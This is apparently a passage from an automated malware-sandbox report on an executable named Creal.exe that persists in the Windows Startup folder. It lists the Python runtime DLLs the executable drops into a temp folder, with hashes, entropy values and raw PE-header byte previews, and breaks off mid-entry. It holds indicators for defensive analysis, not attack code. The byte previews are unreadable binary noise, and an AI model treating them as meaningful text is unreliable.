                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):84992
                                                                                                                                                                                                                                                      Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                                      MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                                      SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                                      SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                                      SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                                      MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                                      SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                                      SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                                      SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                                      MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                                      SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                                      SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                                      SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49744
                                                                                                                                                                                                                                                      Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                                      MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                                      SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                                      SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                                      SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70928
                                                                                                                                                                                                                                                      Entropy (8bit):6.242470629630265
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:FCIB0WWuqkJS86D6rznO6uqM+lY5ZkesIcydIJvn/5YiSyvT2ETh:FCY0WStDwnOLYY5ZkeddIJvnx7Sy75h
                                                                                                                                                                                                                                                      MD5:80083B99812171FEA682B1CF38026816
                                                                                                                                                                                                                                                      SHA1:365FB5B0C652923875E1C7720F0D76A495B0E221
                                                                                                                                                                                                                                                      SHA-256:DBEAE7CB6F256998F9D8DE79D08C74D716D819EB4473B2725DBE2D53BA88000A
                                                                                                                                                                                                                                                      SHA-512:33419B9E18E0099DF37D22E33DEBF15D57F4248346B17423F2B55C8DA7CBE62C19AA0BB5740CFAAC9BC6625B81C54367C0C476EAECE71727439686567F0B1234
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d......g.........." ...).d................................................... ............`.........................................`...P.......d......................../.............T...............................@...............(............................text...)b.......d.................. ..`.rdata...O.......P...h..............@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):84240
                                                                                                                                                                                                                                                      Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                                      MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                                      SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                                      SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                                      SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):179200
                                                                                                                                                                                                                                                      Entropy (8bit):6.189919896183334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:X3LjFuaTzDGA3GrJwUdoSPhpRv9JUizQWS7LkSTLkKWgFIPXD0:X3QaT3GA3NSPhDsizTikSTLLWgF0z0
                                                                                                                                                                                                                                                      MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
                                                                                                                                                                                                                                                      SHA1:0300C6B62CD9DB98562FDD3DE32096AB194DA4C8
                                                                                                                                                                                                                                                      SHA-256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
                                                                                                                                                                                                                                                      SHA-512:7AB432C8774A10F04DDD061B57D07EBA96481B5BB8C663C6ADE500D224C6061BC15D17C74DA20A7C3CEC8BBF6453404D553EBAB22D37D67F9B163D7A15CF1DED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..#-p.p-p.p-p.p$..p!p.p=.q/p.p=.zp)p.p=.q)p.p=.q%p.p=.q!p.pf..q)p.p9.q.p.p-p.p.p.pe..q)p.p$..p,p.pe..q,p.pe.xp,p.pe..q,p.pRich-p.p........................PE..d..._..f.........." ...).....B......@........................................0............`..........................................h..l....i..................T............ ......0O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...n..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):131344
                                                                                                                                                                                                                                                      Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                                      MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                                      SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                                      SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                                      SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):277776
                                                                                                                                                                                                                                                      Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                                      MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                                      SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                                      SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                                      SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                                      Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                                      MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                                      SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                                      SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                                      SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):157968
                                                                                                                                                                                                                                                      Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                                      MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                                      SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                                      SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                                      SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):35600
                                                                                                                                                                                                                                                      Entropy (8bit):6.416657776501014
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:6wehui7ZmQW/3OUDxEiNIJntJ5YiSyvSJz2Ec:whuilG+UDxEiNIJntX7Sy+zO
                                                                                                                                                                                                                                                      MD5:705AC24F30DC9487DC709307D15108ED
                                                                                                                                                                                                                                                      SHA1:E9E6BA24AF9947D8995392145ADF62CAC86BA5D8
                                                                                                                                                                                                                                                      SHA-256:59134B754C6ACA9449E2801E9E7ED55279C4F1ED58FE7A7A9F971C84E8A32A6C
                                                                                                                                                                                                                                                      SHA-512:F5318EBB91F059F0721D75D576B39C7033D566E39513BAD8E7E42CCC922124A5205010415001EE386495F645238E2FF981A8B859F0890DC3DA4363EB978FDBA7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Y)v.7zv.7zv.7z..zt.7zf,6{t.7zf,4{u.7zf,3{~.7zf,2{{.7z>-6{t.7zv.6z..7z=.6{s.7z>-:{t.7z>-7{w.7z>-.zw.7z>-5{w.7zRichv.7z........PE..d......g.........." ...). ...>......@...............................................%.....`......................................... E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata..6 ...0..."...$..............@..@.data...p....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):55568
                                                                                                                                                                                                                                                      Entropy (8bit):6.3313243577146485
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:+kMm7HdG/l5fW3UguCE+eRIJWtd7SyJds:+wIQUFCEbRIJWtd6
                                                                                                                                                                                                                                                      MD5:A72527454DD6DA346DDB221FC729E3D4
                                                                                                                                                                                                                                                      SHA1:0276387E3E0492A0822DB4EABE23DB8C25EF6E6F
                                                                                                                                                                                                                                                      SHA-256:404353D7B867749FA2893033BD1EBF2E3F75322D4015725D697CFA5E80EC9D0F
                                                                                                                                                                                                                                                      SHA-512:FEFB543D20520F86B63E599A56E2166599DFA117EDB2BEB5E73FC8B43790543702C280A05CCFD9597C0B483F637038283DD48EF8C88B4EA6BAC411EC0043B10A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d.....g.........." ...).L...`......@................................................}....`.............................................X................................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...@...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                                                                                      Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                                      MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                                      SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
